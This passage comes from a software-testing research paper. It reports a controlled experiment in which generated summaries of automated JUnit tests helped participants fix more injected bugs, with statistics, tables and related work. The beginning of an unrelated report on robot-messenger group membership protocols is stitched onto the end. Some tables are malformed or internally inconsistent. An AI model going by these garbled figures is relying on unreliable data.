The context of our study consists of (i) objects, i.e., Java classes extracted from two open-source Java projects, and (ii) participants testing the selected objects, i.e., professional developers, researchers and students from the University of Zurich and the Delft University of Technology. Specifically, the object systems are Apache Commons Primitives and Math4J, which have been used in previous studies on search-based software testing [23, 24, 44]. From these projects, we selected two Java classes: (i) Rational, which implements a rational number, and (ii) ArrayIntList, which implements a list of primitive int values using an array. Table 1 details the characteristics of the classes used in the experiment. eLOC counts the effective lines of source code, i.e., source lines excluding pure comments, braces and blanks [33]. For each class we consider a faulty version with five injected faults available from previous studies [23, 24]. These faults were generated using a mutation analysis tool, which selected the five mutants (faults) most difficult to kill, i.e., the ones that can be detected by the lowest number of test cases [23, 24]. These classes are non-trivial, yet feasible to test within an hour; they require neither (i) learning complex algorithms nor (ii) examining other classes in the same library [23].
To recruit participants we sent email invitations to our contacts from industrial partners as well as to students and researchers from the Departments of Computer Science at the University of Zurich and at Delft University of Technology. In total we sent out 44 invitations (12 developers and 32 researchers). In the end, 30 subjects (67%) performed the experiment and sent their data back, see Table 2. Of them, 7 were professional developers from industry and 23 were students or senior researchers from the authors’ Computer Science Departments. All of the 7 professional developers had more than seven years of programming experience in Java (one of them more than 15 years). Among the 23 subjects from our departments, 2 were Bachelor’s students, 5 were Master’s students, 14 were PhD students, and 2 were senior researchers. Each participant had at least three years of prior experience with Java and the JUnit testing framework.
3.3 Experimental Procedure
The experiment was executed offline, i.e., participants received the experimental material via an online survey platform\footnote{http://www.esurveyspro.com} that we used to collect data and to monitor time and activities. An example of the survey sent to the participants can be found online\footnote{http://www.ifi.uzh.ch/seal/people/panicella/tools/TestDescriber/Survey.pdf}. Each participant received an experiment package consisting of (i) a statement of consent, (ii) a pre-test questionnaire, (iii) instructions and materials to perform the experiment, and (iv) a post-test questionnaire. Before the study, we explained to participants what we expected them to do during the experiment: they were asked to perform two testing sessions, one for each faulty Java class. They could use the test suite (i.e., JUnit test cases) generated by Evosuite to test the given classes and to fix the injected bugs. Each participant received two tasks: (i) one task included one Java class to test plus the corresponding generated JUnit test cases enriched WITH the summaries generated by TestDescriber; (ii) the second task consisted of a second Java class to test together with the corresponding generated JUnit test cases WITHOUT summaries.
The experimental material was prepared to avoid learning effects: each participant received two different Java classes for the two testing tasks, and each participant received, for one task, test cases enriched with the corresponding summaries and, for the other task, test cases without summaries. We assigned the tasks so as to have a balanced number of participants who tested (i) the first class with summaries followed by the second class without summaries, and (ii) the first class without summaries followed by the second class with summaries. Since Evosuite uses randomized search algorithms (i.e., each run generates a different set of test cases with different input parameters), we provided each participant with different starting test cases.
Before starting the experiment, each participant was asked to fill in the pre-study questionnaire reporting their programming and testing experience. After filling in the questionnaire, they could start the first testing task by opening
**Table 1: Java classes used as objects of our study**

| Project | Class | eLOC | Methods | Branches |
|--------------------|--------------|------|---------|----------|
| Commons Primitives | ArrayIntList | 65 | 12 | 28 |
| Math4J | Rational | 64 | 10 | 25 |
**Table 2: Experience of Participants**

| Programming Experience | Absolute # | Frequency |
|------------------------|------------|-----------|
| 1-2 years | 1 | 3.3% |
| 3-6 years | 20 | 66.6% |
| 7-10 years | 8 | 26.6% |
| >10 years | 1 | 3.3% |
| Σ | 30 | 100% |
the provided workspace in the Eclipse IDE. The stated goals were (i) to test the target class as much as possible, and (ii) to fix the bugs. Clearly, we did not reveal to the participants where the bugs were injected, nor the number of bugs injected in each class. In the instructions we carefully explained that the generated JUnit test cases pass ("are green") since Evosuite, like other modern test generation tools [16, 40], generates assertions that reflect the current behavior of the class [21]. Consequently, if the current behavior is faulty, the assertions reflect the incorrect behavior and, thus, must be checked and eventually corrected [23].
Therefore, participants were asked to start by reading the available test suite, and to edit the test cases to correct the assertions where needed. They were also instructed to add new tests if they thought that some parts of the target classes were not tested, as well as to delete tests they did not understand or like. In each testing session, participants were instructed to spend no more than 45 minutes on each task and to finish earlier if and only if (i) they believed that their test cases covered all the code and (ii) they had found and fixed all the bugs. Following the experiment, subjects were required to fill in an exit survey that we used for qualitative analysis and to collect feedback. In total, the duration of the experiment was two hours, including completing the two tasks and filling in the pre-test and post-test questionnaires.
We want to highlight that we did not reveal to the participants the real goal of our study, which is to measure the impact of test case summaries on their ability to fix bugs. Similarly, we did not tell them that they received two different tasks, one with and one without summaries. Even in the email invitations used to recruit participants, we did not provide any details about our goal but used a more general motivation, namely to better understand the bug fixing practice of developers during their testing activities when relying on generated test cases.
3.4 Research Method
At the end of the experiment, each participant produced two artifacts for each task: (i) the test suite automatically generated by Evosuite, with possible fixes or edits by the participant, e.g., added assertions to reveal faults; and (ii) the original (fixed) target class, i.e., without (some of) the injected bugs. We analyzed the target classes provided by the participants to answer RQ1: for each class we inspected the modifications applied by each participant to verify whether they are correct (true bug fixes) or not. We then counted the exact number of seeded bugs fixed by each participant to determine to what extent test summaries impact their bug fixing ability.
For RQ2 we computed several structural coverage metrics for each produced test suite when executed on the original classes, i.e., on the target classes without bugs [23, 24]. Specifically, we use Cobertura to collect the statement, branch, and method coverage scores achieved. The mutation score was computed by executing the JUnit test suite using PIT\(^\text{13}\), a popular command line tool that automatically seeds faults into Java code, generating mutants. Then, it runs the available tests and computes the resulting mutation score, i.e., the percentage of mutants detected by the test suites. As is typical in mutation testing, a mutant is killed (covered) if at least one test fails; if all tests pass, the mutant is not covered.
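The kill rule described above can be sketched as follows; here tests are modeled as predicates over mutant identifiers, a deliberate simplification for illustration, not PIT's implementation:

```java
import java.util.List;
import java.util.function.Predicate;

// Minimal sketch of the mutation-score rule: a mutant is killed
// when at least one test fails on it; the score is the fraction
// of killed mutants. A "test" here is a predicate that returns
// true when it passes on a given mutant (an illustrative model).
public class MutationScore {

    static double score(List<Integer> mutantIds, List<Predicate<Integer>> tests) {
        long killed = mutantIds.stream()
            .filter(m -> tests.stream().anyMatch(t -> !t.test(m)))
            .count();
        return (double) killed / mutantIds.size();
    }

    public static void main(String[] args) {
        List<Predicate<Integer>> tests = List.of(
            m -> m != 1,   // fails on (kills) mutant 1
            m -> m != 3);  // fails on (kills) mutant 3
        System.out.println(score(List.of(1, 2, 3, 4), tests)); // -> 0.5
    }
}
```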
Once we collected all the data, we used statistical tests to verify whether there is a statistically significant difference between the scores (e.g., the number of fixed bugs) achieved by participants when relying on tests with and without summaries. We employed non-parametric tests since the Shapiro-Wilk test revealed that neither the number of detected bugs, nor the coverage or mutation measures, follow a normal distribution ($p \ll 0.01$). Hence, we used the non-parametric Wilcoxon Rank Sum test with a $p$-value threshold of 0.05. Significant $p$-values indicate that there is a statistically significant difference between the scores (e.g., number of fixed bugs) achieved by the two groups, i.e., by participants using test cases with and without summaries. In addition, we computed the effect size of the observed differences using the Vargha-Delaney ($\hat{A}_{12}$) statistic [52], which also classifies the obtained effect size values into four levels (negligible, small, medium and large) that are easier to interpret. We also checked whether other co-factors, such as programming experience, interact with the main treatment (test summaries) on the dependent variable (number of bugs fixed). This was done using a two-way permutation test [4], a non-parametric equivalent of the two-way Analysis of Variance (ANOVA). We set the number of iterations of the permutation test procedure to 1,000,000 to ensure that results did not vary over multiple executions of the procedure [4].
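The Vargha-Delaney statistic has a simple closed form over all pairs from the two groups, $\hat{A}_{12} = (\#(x > y) + 0.5\,\#(x = y))/(mn)$, and can be sketched as follows (the class name is our own):

```java
import java.util.List;

// Minimal sketch of the Vargha-Delaney A12 effect size: the
// probability that a value drawn from the first group exceeds one
// drawn from the second, counting ties as 1/2. A12 = 0.5 means no
// difference; values near 1 favor the first group.
public class VarghaDelaney {

    static double a12(List<Double> first, List<Double> second) {
        double wins = 0.0;
        for (double x : first) {
            for (double y : second) {
                if (x > y) wins += 1.0;
                else if (x == y) wins += 0.5;
            }
        }
        return wins / (first.size() * second.size());
    }

    public static void main(String[] args) {
        // toy data: bugs fixed with vs. without summaries
        List<Double> withSummaries = List.of(4.0, 5.0, 3.0);
        List<Double> withoutSummaries = List.of(2.0, 3.0, 2.0);
        System.out.println(a12(withSummaries, withoutSummaries));
    }
}
```

Identical groups yield exactly 0.5, and a group that dominates every pairwise comparison yields 1.0.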
Parameter Configuration. Several parameters control the performance of Evosuite in terms of structural coverage; in addition, there are different coverage criteria to optimize when generating test cases. We adopted the default parameter settings of Evosuite [21], since a previous empirical study [2] demonstrated that the default values widely used in the literature give reasonably acceptable results. For the coverage criterion, we consider the default, which is branch coverage, again in line with previous experiments [23, 24]. The only parameter we changed is the running time: we ran Evosuite for ten minutes in order to achieve the maximum branch coverage.
4. RESULTS
In the following, we report results of our study, with the aim of answering the research questions formulated in Section 3.
4.1 RQ1: Bug Fixing
Figure 4 depicts the box-plots of the number of bugs fixed by the participants, grouped by (i) the target class to fix and (ii) the availability of TestDescriber-generated summaries. The results indicate that for both tasks the number
\[^{13}\text{http://pitest.org/}\]
of bugs fixed is substantially higher when the participants had test summaries at their disposal. Specifically, from Figure 4 we can observe that for the class ArrayIntList participants without TestDescriber summaries were able to correctly identify and fix 2 out of 5 bugs (median value; 40% of injected bugs), and no participant was able to fix all the injected bugs. Vice versa, when we provided the TestDescriber summaries to the participants, the median number of bugs fixed is 3, and about 30% of the participants were able to fix all the bugs. This is an important improvement (+50% of bugs fixed) considering that in both scenarios, WITH and WITHOUT summaries, the amount of time given to the participants was the same. Similarly, for Rational, when relying on test cases with summaries, the median number of bugs fixed is 4 out of 5 (80%) and 31% of participants were able to fix all the bugs. Vice versa, using test cases without summaries the participants fixed 2 bugs (median value). Hence, when using the summaries the participants were able to fix twice as many bugs (+100%) with respect to the scenario in which they were provided test cases without comments.
The results of the Wilcoxon test highlight that the use of TestDescriber summaries significantly improved the bug fixing performance of the participants in each target class achieving p-values of 0.014 and < 0.01 for ArrayIntList and Rational respectively (which are smaller than the significance level of 0.05). The Vargha-Delaney $A_{12}$ statistic also reveals that the magnitude of the improvements is large for both target classes: the effect size is 0.76 and 0.78 for ArrayIntList and Rational respectively. Finally, we used the two-way permutation test to check whether the number of fixed bugs between the two groups (test cases with and without summaries) depends on and interacts with the participants’ programming experience, which can be a potential co-factor. The two-way permutation test reveals that (i) the number of bugs fixed is not significantly influenced by the programming experience (p-values $\in$ {0.5736, 0.1372}) and (ii) there is no significant interaction between the programming experience and the presence of test case summaries (p-values $\in$ {0.3865, 0.1351}). This means that all participants benefit from using the TestDescriber summaries, independent of their programming experience.
This finding is particularly interesting if we consider that Fraser et al. [23, 24] reported no statistically significant difference between the number of bugs detected by developers when performing manual testing and when using automatically generated test cases. Specifically, our study includes (i) two of the classes Fraser et al. used in their experiments (ArrayIntList and Rational), (ii) the same set of injected bugs, and (iii) test cases generated with the same tool. In this paper we show that the summaries generated by TestDescriber can significantly help developers in detecting and fixing bugs. However, a larger sample size (i.e., more participants) would be needed to compare the performance of participants when performing manual testing, i.e., when they are not assisted by automatic tools like Evosuite and TestDescriber at all. In summary, we can conclude that
**RQ1** Using automatically generated test case summaries significantly helps developers to identify and fix more bugs.
**4.2 RQ2: Test Case Management**
To answer RQ2, we verify whether measurable features other than the test case summaries might have influenced the results of RQ1. To this aim, Tables 3 and 4 summarize the structural coverage scores achieved by the test suites produced by the participants during the experiment. As we can see from Table 3, there is no substantial difference in the structural coverage achieved by the test suites produced by participants with and without test case summaries for ArrayIntList. Specifically, method, branch and statement coverage are almost identical. Similar results are achieved for Rational, as shown in Table 4: for method, branch and statement coverage there is no difference between the tests produced by participants with and without test summaries. Consequently, for both classes the p-values provided by the Wilcoxon test are not statistically significant and the effect size is always negligible. We hypothesize that these results are due to the fact that the original test suites generated by Evosuite, which the participants used as a starting point to test the target classes, already achieved very high structural coverage (> 70% in all cases). Therefore, even though the participants were asked to modify (when needed) the test cases to correct wrong assertions, at the end of the experiment the final coverage was only slightly impacted by these changes.
For the mutation analysis, the mutation scores achieved by the tests produced by the participants seem to be slightly lower when using test summaries (-1% on average) for ArrayIntList. However, the Wilcoxon test reveals that this difference is not statistically significant and the Vargha-Delaney $A_{12}$ measure is negligible. For Rational we can notice an improvement in terms of mutation score (+10%) for the tests produced by participants who were provided with test summaries. The Wilcoxon test reveals a marginally significant p-value (0.08) and the Vargha-Delaney $A_{12}$ measure indicates a medium, positive effect size for our test summaries, i.e., participants produced test cases able to kill more mutants when using the test summaries. A replication study with more participants would be needed to further investigate whether the mutation score can be positively influenced by using test summaries.
**Table 3: Statistics for the test suites edited by the participants for ArrayIntList**

| Variable | Factor | Min | Mean | Max | p-value | $A_{12}$ |
|----------------|---------|------|------|------|---------|----------|
| Method Cov. | With | 0.36 | 0.66 | 0.86 | 0.03 | - |
| | Without | 0.50 | 0.65 | 0.86 | - | - |
| Statement Cov. | With | 0.52 | 0.68 | 0.83 | 0.83 | - |
| | Without | 0.61 | 0.68 | 0.85 | - | - |
| Branch Cov. | With | 0.54 | 0.68 | 0.82 | 0.87 | - |
| | Without | 0.58 | 0.67 | 0.82 | - | - |
| Mutation Score | With | 0.13 | 0.29 | 0.45 | 0.45 | - |
| | Without | 0.13 | 0.30 | 0.52 | - | - |
**Table 4: Statistics for the test suites edited by the participants for Rational**
<table>
<thead>
<tr>
<th>Variable</th>
<th>Factor</th>
<th>Min</th>
<th>Mean</th>
<th>Max</th>
<th>p-value</th>
<th>$A_{12}$</th>
</tr>
</thead>
<tbody>
<tr>
<td>Method Cov.</td>
<td>With</td>
<td>0.89</td>
<td>0.97</td>
<td>1.00</td>
<td>1.00</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.92</td>
<td>0.97</td>
<td>1.00</td>
<td>1.00</td>
<td>-</td>
</tr>
<tr>
<td>Statement Cov.</td>
<td>With</td>
<td>0.85</td>
<td>0.86</td>
<td>0.90</td>
<td>0.89</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.85</td>
<td>0.86</td>
<td>0.90</td>
<td>0.89</td>
<td>-</td>
</tr>
<tr>
<td>Mutation Score</td>
<td>With</td>
<td>0.52</td>
<td>0.71</td>
<td>0.93</td>
<td>0.08</td>
<td>0.69 (M)</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.31</td>
<td>0.61</td>
<td>0.89</td>
<td>-</td>
<td>-</td>
</tr>
</tbody>
</table>
**RQ2** Test case summaries do not influence how the developers manage the test cases in terms of structural coverage.
5. DISCUSSION AND LESSONS LEARNT
In the following, we provide additional, qualitative insights to the quantitative study reported in Section 4.
Summaries and comprehension. At the end of each task we asked each participant to evaluate the comprehensibility of the test cases (either with or without summaries) on a Likert intensity scale from very-low to very-high (involving all 30 participants). When posing this question we did not explicitly mention terms like "test summaries" but instead "test comments", to avoid biasing the participants' answers. Figure 5 compares the scores given by participants to the provided test cases (i.e., generated by Evosuite) according to whether the tests were enriched (WITH) or not (WITHOUT) with summaries. When the test cases were commented with summaries (WITH), 46% of participants labeled the test cases as easy to understand (high or very high comprehensibility), with only 18% of participants considering them incomprehensible. Conversely, when the test cases were not enriched with summaries (WITHOUT), only 15% of participants judged the test cases easy to understand, while a substantial percentage of participants (40%) labeled them difficult to understand. The Wilcoxon test also reveals that this difference is statistically significant (p-value = 0.0050), with a positive, medium effect size (0.71) according to the Vargha-Delaney $\hat{A}_{12}$ statistic. Therefore, we can argue that “Test summaries statistically improve the comprehensibility of automatically generated test cases according to human judgments.”
Post-test Questionnaire. Table 5 reports the results to questions from the exit survey. The results demonstrate that in most of the cases the participants considered the test summaries (when available) as the most important source of information to perform the tasks after the source code itself, i.e., the code of the target classes to fix. Indeed, when answering Q1 and Q2 the most common opinion is that the source code is the primary source of information (47% in Q1 and 43% of the opinions in Q2), followed by the test summaries (20% in Q1 and 53% in Q2). In contrast, participants deem the actual test cases generated by Evosuite to be less important than (i) the test summaries and (ii) the test cases they created themselves during the experiment. As confirmation of this finding, we received positive feedback from both junior and more experienced participants, such as “the generated test cases with comments are quite useful” and “comments give me [a] better (and more clear) picture of the goal of a test.”
From Table 5 we can also observe that participants mainly considered the tests generated by Evosuite as a starting point for testing the target classes. Indeed, these tests must be updated (e.g., checking the assertions) and enriched with further manually written tests (Q3), since in most cases they exercise the easier parts of the program under test (according to 80% of opinions for Q8). Automatically generated tests are in most cases (66% of participants) considered difficult to read and understand (Q4), especially if not enriched with summaries describing what they are going to test (Q5 and Q6).
Quality of the summaries. Finally, we asked the participants to evaluate the overall quality of the provided test summaries, as done in traditional work on source code summarization [37, 48]. We evaluate the quality according to three widely known dimensions [37, 48]:
- **Content adequacy:** considering only the content of the comments of JUnit test cases, is the important information about the class under test reflected in the summary?
- **Conciseness:** considering only the content of the comments in the JUnit test cases, is there extraneous or irrelevant information included in the comments?
- **Expressiveness:** considering only the way the comments of JUnit test cases are presented, how readable and understandable are the comments?
Table 5: Raw data for exit questionnaire (SC=Source Code, TCS=TC Summaries, TC=Test Cases, and MTC=Manually written TC).
<table>
<thead>
<tr>
<th>Questions</th>
<th>SC</th>
<th>TCS</th>
<th>TC</th>
<th>MTC</th>
<th>Other</th>
</tr>
</thead>
<tbody>
<tr>
<td>Q1: What is the best source of information?</td>
<td>47%</td>
<td>30%</td>
<td>20%</td>
<td>5%</td>
<td>0%</td>
</tr>
<tr>
<td>Q2: Can you rank the specified sources of information in order of importance from 1 (high) to 5 (low)?</td>
<td>(rank 1) 43%</td>
<td>27%</td>
<td>27%</td>
<td>5%</td>
<td>0%</td>
</tr>
<tr>
<td></td>
<td>(rank 2) 17%</td>
<td>53%</td>
<td>30%</td>
<td>6%</td>
<td>0%</td>
</tr>
<tr>
<td></td>
<td>(rank 3) 27%</td>
<td>23%</td>
<td>33%</td>
<td>10%</td>
<td>7%</td>
</tr>
<tr>
<td></td>
<td>(high) to (low)</td>
<td>17%</td>
<td>17%</td>
<td>10%</td>
<td>57%</td>
</tr>
</tbody>
</table>
Table 6: Raw data of the questionnaire concerning the evaluation of TestDescriber summaries.
<table>
<thead>
<tr>
<th>Content adequacy</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Is not missing any information.</td>
<td>50%</td>
</tr>
<tr>
<td>Missing some information.</td>
<td>37%</td>
</tr>
<tr>
<td>Missing some very important information.</td>
<td>13%</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Conciseness</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Has no unnecessary information.</td>
<td>38%</td>
</tr>
<tr>
<td>Has some unnecessary information.</td>
<td>52%</td>
</tr>
<tr>
<td>Has a lot of unnecessary information.</td>
<td>10%</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Expressiveness</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Is easy to read and understand.</td>
<td>70%</td>
</tr>
<tr>
<td>Is somewhat readable and understandable.</td>
<td>30%</td>
</tr>
<tr>
<td>Is hard to read and understand.</td>
<td>0%</td>
</tr>
</tbody>
</table>
The analysis is summarized in Table 6. The results highlight that (i) 87% of the participants consider the TestDescriber comments adequate (they do not miss very important information); (ii) 90% of them perceive the summaries as sufficiently concise, as they contain no (38%) or only some (52%) unnecessary information; (iii) 100% of participants consider the comments easy to read or at least somewhat readable. In summary, the majority of the participants consider the comments generated by TestDescriber concise and easy to understand.
**Feedback.** Comments collected from the survey participants provided interesting feedback for improving TestDescriber summaries:
- **Redundant information from test to test**: developers in our study were concerned that TestDescriber generates the same comments for similar test cases; as a solution, they suggested generating, for each assertion already exercised in a previous test method, an inline comment specifying that the assertion was already tested in that earlier test method.
- **Unhelpful naming of test methods**: for several participants the name of a test gives no hint about the method under test. They suggested to (i) “...rename the method names to useful names... so that it is possible to see at a glance what is actually being tested by that test case” or (ii) “...describe in the javadoc of a test method which methods of the class are tested.”
**Lessons Learnt.** As indicated in Section 4.2, test suites with high structural coverage are not necessarily more effective at helping developers detect and fix bugs. Most automatic testing tools treat structural coverage as the main goal to optimize, under the assumption that higher coverage is strongly related to a test’s effectiveness [3]. However, our results provide clear evidence that this is not always true, as also confirmed by the non-parametric Spearman \( \rho \) correlation test: the correlation between the number of bugs fixed and the structural coverage metrics is always lower than 0.30 for **ArrayIntList** and 0.10 for **Rational**. Only the mutation score has a correlation coefficient larger than 0.30 for both classes. On the other hand, the results of RQ1 provide clear evidence that the summaries generated by TestDescriber play a significant role, even though they change neither the code nor the structural coverage of the original test cases generated by Evosuite. Therefore, we argue that comprehensibility and readability are two further dimensions that should be considered (together with structural coverage) when systematically evaluating automatic test generation tools.
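The Spearman \( \rho \) used above is simply the Pearson correlation computed on the rank-transformed data. A minimal pure-Python sketch (the sample data are hypothetical, not the study's measurements):

```python
def rank(values):
    """1-based average ranks; tied values share the mean rank."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    ranks = [0.0] * len(values)
    i = 0
    while i < len(order):
        j = i
        # extend j over the run of equal values
        while j + 1 < len(order) and values[order[j + 1]] == values[order[i]]:
            j += 1
        avg = (i + j) / 2.0 + 1.0
        for k in range(i, j + 1):
            ranks[order[k]] = avg
        i = j + 1
    return ranks

def spearman_rho(xs, ys):
    """Pearson correlation of the ranks of xs and ys."""
    rx, ry = rank(xs), rank(ys)
    n = len(xs)
    mx, my = sum(rx) / n, sum(ry) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(rx, ry))
    sx = sum((a - mx) ** 2 for a in rx) ** 0.5
    sy = sum((b - my) ** 2 for b in ry) ** 0.5
    return cov / (sx * sy)

# Hypothetical coverage vs. bugs-fixed data (illustrative only)
coverage = [0.62, 0.70, 0.55, 0.81, 0.66]
bugs_fixed = [1, 2, 1, 2, 3]
rho = spearman_rho(coverage, bugs_fixed)
```

Because it works on ranks, \( \rho \) captures any monotone relationship, not only linear ones, which is why it suits ordinal outcomes such as a count of fixed bugs.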
6. **THREATS TO VALIDITY**
In this section, we outline possible threats to the validity of our study and show how we mitigated them.
**Construct Validity.** Threats to construct validity concern the way in which we set up our study. Because the study was performed in a remote setting in which participants could work on the tasks at their own discretion, we could not oversee their behaviour, and the metadata sent to us could be affected by imprecisions since the experiment was conducted offline. However, we shared the experimental data with the participants through an online survey platform, which forced the participants (1) to perform the tasks in the desired order and (2) to fill in the questionnaires. Participants only got access to the final questionnaire after they had handed in their tasks, and they could not start the second task without finishing the first one. Furthermore, the online platform allowed us to monitor the total time each participant spent on the experiment. We also made sure participants were not aware of the actual aim of the study.
**Internal Validity.** Threats to internal validity concern factors that might affect the causal relationship. To avoid bias in the task assignment, we randomly assigned the tasks to the participants so as to have the same number of data points for all classes/treatments. To collect a sufficient number of data points for statistical significance tests, each participant performed two bug fixing tasks—one with test summaries and one without, on different classes—rather than a single task, producing 60 data points in this study. The two Java classes used as objects for the two tasks have similar difficulty and can easily be tested in 45 minutes, even by intermediate programmers [23, 24]. Another factor that could influence our results is the order of assignments, i.e., first with summaries and then without, or vice versa. However, the two-way permutation test reveals no significant interaction between the order of assignments and the two tasks on the final outcome, i.e., the number of bugs fixed (\( p\)-value = 0.7189).
**External Threats.** External threats concern the generalizability of our findings. We considered two Java classes already used in two previous controlled experiments investigating the effectiveness of automated test case generation tools compared to manual testing [23, 24]. We also used the same set of bugs injected using a mutation analysis tool, which is common practice for evaluating the effectiveness of testing techniques in the literature [23, 24, 25]. We plan to evaluate TestDescriber with a larger set of classes, investigating its usefulness in the presence of more complex branches. Future work also needs to address which aspects of the generated summaries are useful: is the coverage summary useful to developers and, if so, in what way?
Another threat is that the majority of our study participants have an academic background. Recent studies have shown that students perform similarly to industrial subjects, as long as they are familiar with the task at hand [31, 38]. All our student participants had at least 3 years of experience with the technologies used in the study (see Section 3.2). Moreover, our population included a substantial share of professional developers, and the median programming experience of our participants is 3-6 years. Nevertheless, we plan to replicate this study with more participants in order to increase confidence in the generalizability of our results.
**Conclusion Threats.** In our study we used TestDescriber to generate test summaries for JUnit test cases generated by Evosuite. Using different automatic test generation tools might lead to different results in terms of test case comprehensibility. However, we note that the (i) coverage, (ii) structure, and (iii) size of test cases generated with Evosuite are comparable to the output produced by other modern test generation tools, such as Randoop [40], JCrasher [16], etc.
We support our findings by using appropriate statistical tests, i.e., the non-parametric Wilcoxon test and the two-way permutation test, to exclude that other co-factors (such as programming experience) affect our conclusions. We also used the Shapiro-Wilk normality test to verify whether our data deviated from normality, motivating the use of non-parametric tests. Finally, we used the Vargha-Delaney $\hat{A}_{12}$ statistic to measure the magnitude of the differences between the treatments.
7. RELATED WORK
In this section, we discuss the related literature on source code summarization and readability of test cases.
Source Code Summarization. Murphy's dissertation [39] is the earliest work proposing an approach to generate summaries by analysing structural information of the source code. More recently, Sridhara et al. [47] suggested using pre-defined natural language sentence templates filled with linguistic elements (verbs, nouns, etc.) extracted from important method signatures [19, 20]. Other studies used the same strategy to summarize Java methods [26, 34, 48], parameters [50], groups of statements [49], Java classes [37], or services of Java packages [27], or to generate commit messages [15]. Other reported applications generate source code documentation and summaries by mining text from other sources of information, such as bug reports [42], e-mails [42], forum posts [17], and question-and-answer (Q&A) discussions [53, 55].
However, Binkley et al. [7] and Jones et al. [46] pointed out that the evaluation of the generated summaries should not be done by just answering the general question "is this a good summary?" but evaluated "through the lens of a particular task". Stemming from these considerations, in this paper we evaluated the impact of automatically generated test summaries in the context of two bug fixing tasks. In contrast, most previous studies on source code summarization have been evaluated by simply surveying human participants about the quality of the provided summaries [7, 26, 34, 37, 47, 48].
Test Comprehension. The problem of improving test understandability is well known in the literature [14], especially in the case of test failures [9, 57]. For example, Zhang et al. [57] focused on failing tests and proposed a technique based on static slicing to generate code comments describing the failure and its causes. Buse et al. [9] proposed a technique to generate human-readable documentation for unexpectedly thrown exceptions. However, both approaches require that tests fail [57] or throw unexpected Java exceptions [9]. This never happens for automatically generated test cases, since the automatically generated assertions reflect the current behaviour of the class [24]. Consequently, if the current behaviour is faulty, the generated assertions do not fail because they reflect the incorrect behaviour.
Kamimura et al. [32] argued that developers might benefit from a consumable and understandable textual summary of a test case, and proposed an initial step towards generating such summaries based on static analysis of the code composing the test cases. From an engineering point of view, our work continues this line of research; however, it is novel for two main reasons. First, our approach generates summaries combining three different levels of granularity: (i) a summary of the main responsibilities of the class under test (class level); (ii) a fine-grained description of each statement composing the test case, as done in the past [32] (test level); and (iii) a description of the branch conditions traversed in the executed path of the class under test (coverage level). As such, our approach combines code coverage and summarization to describe the effect of test case execution in terms of structural coverage. Second, we evaluate the impact of the generated test summaries in a realistic scenario where developers were asked to test and fix faulty classes.
Understandability is also closely related to test size and the number of assertions [3]. For these reasons, previous work on automatic test generation focused on (i) reducing the number of generated tests by applying post-process minimization [21], and (ii) reducing the number of assertions by using mutation analysis [25] or by splitting tests with multiple assertions [56]. To improve the readability of the code composing the generated tests, Daka et al. [18] proposed a mutation-based post-processing technique that uses a domain-specific model of unit test readability based on human judgement. Afshan et al. [1] investigated the use of a linguistic model to generate more readable input strings. Our paper shows that summaries are an important element for complementing and improving the readability of automatically generated test cases.
8. CONCLUSION AND FUTURE WORK
Recent research has challenged the assumption that structural coverage is the only goal to optimize [1, 54], suggesting that understandability of test cases is a key factor in the context of automated test generation. In this paper we address the usability of automatically generated test cases, making the following main contributions:
- We present TestDescriber, a novel approach to generate natural language summaries of JUnit tests. TestDescriber automatically generates summaries of the portion of code exercised by each individual test case, providing a dynamic view of the CUT.
- To evaluate TestDescriber, we have set up an empirical study involving 30 human participants from both industry and academia. Specifically, we investigated the impact of the generated test summaries on the number of bugs actually fixed by developers when assisted by automated test generation tools.
Results of the study indicate that (RQ1) TestDescriber substantially helps developers find more bugs (twice as many) while reducing testing effort, and (RQ2) test case summaries do not influence how developers manage test cases in terms of structural coverage. Additionally, TestDescriber could be used to automatically document tests, improving their readability and understandability. Results of our post-test questionnaire reveal that test summaries significantly improve the comprehensibility of test cases. Future work will proceed in several directions. We plan to further improve TestDescriber summaries by (i) incorporating the feedback received from the participants of our study, (ii) combining our approach with recent work that improves the readability of the code composing the generated tests [18], and (iii) complementing the generated summaries with further coverage criteria, such as branch or mutation coverage. We also aim to replicate the study with additional developers.
Research Report (School of Information Science, Japan Advanced Institute of Science and Technology)
Fault-Tolerant Group Membership Protocols using Physical Robot Messengers
Rami Yared\(^1\), Xavier Défago\(^{1,2}\), and Takuya Katayama\(^1\)
\(^1\)School of Information Science, Japan Advanced Institute of Science and Technology (JAIST)
\(^2\)PRESTO, Japan Science and Technology Agency (JST)
December 1, 2004
IS-RR-2004-019
Fault-tolerant group membership protocols using physical robot messengers
Rami Yared*, Xavier Défago*†, and Takuya Katayama*
*School of Information Science
Japan Advanced Institute of Science and Technology (JAIST)
1-1 Asahidai, Tatsunokuchi, Ishikawa 923-1292, Japan
†PRESTO, Japan Science and Technology Agency (JST)
Email: {r-yared,defago,katayama}@jaist.ac.jp
Abstract
In this paper, we study the group membership and view synchrony problem in a distributed system composed of a group of teams of mobile robots that communicate by physical robot messengers.
Communication by robot messengers raises new issues and calls for fault-tolerance techniques that differ from those used in traditional distributed systems.
1 Introduction
In this paper, we define a distributed system composed of a group of teams of cooperative autonomous mobile robots, in which communication between teams takes place by physically sending a robot messenger from the sending team to the receiving team. Such a system has distinct aspects and issues that differ from those of conventional distributed systems.
Comparison with traditional distributed systems: a team of mobile robots maps to a process in a traditional distributed system, with the difference that a team cannot send any message while its pool of messengers is empty (unless it receives a messenger from another team), whereas a process can send messages at any time.
Obviously, communication by messengers incurs longer delays and larger transmission times between nodes, compared to conventional communication media such as radio, electric signals, and infrared beams.
A remarkable advantage of teams of mobile robots is that a robot messenger has enough memory to carry any quantity of available messages from a source team to a destination team, in contrast to the bandwidth limitations of communication channels in traditional distributed systems.
Concerning fault tolerance, we assume in this paper that both teams and messengers fail by crashing. A team failure maps to a process failure, and a messenger failure corresponds to a lossy channel; the major difference resides in the fault-tolerance techniques. To tolerate a bounded number of faulty messengers, the sending team dispatches a set of messengers whose cardinality is greater than the maximal number of faulty messengers in the system, which guarantees a reliable communication channel.
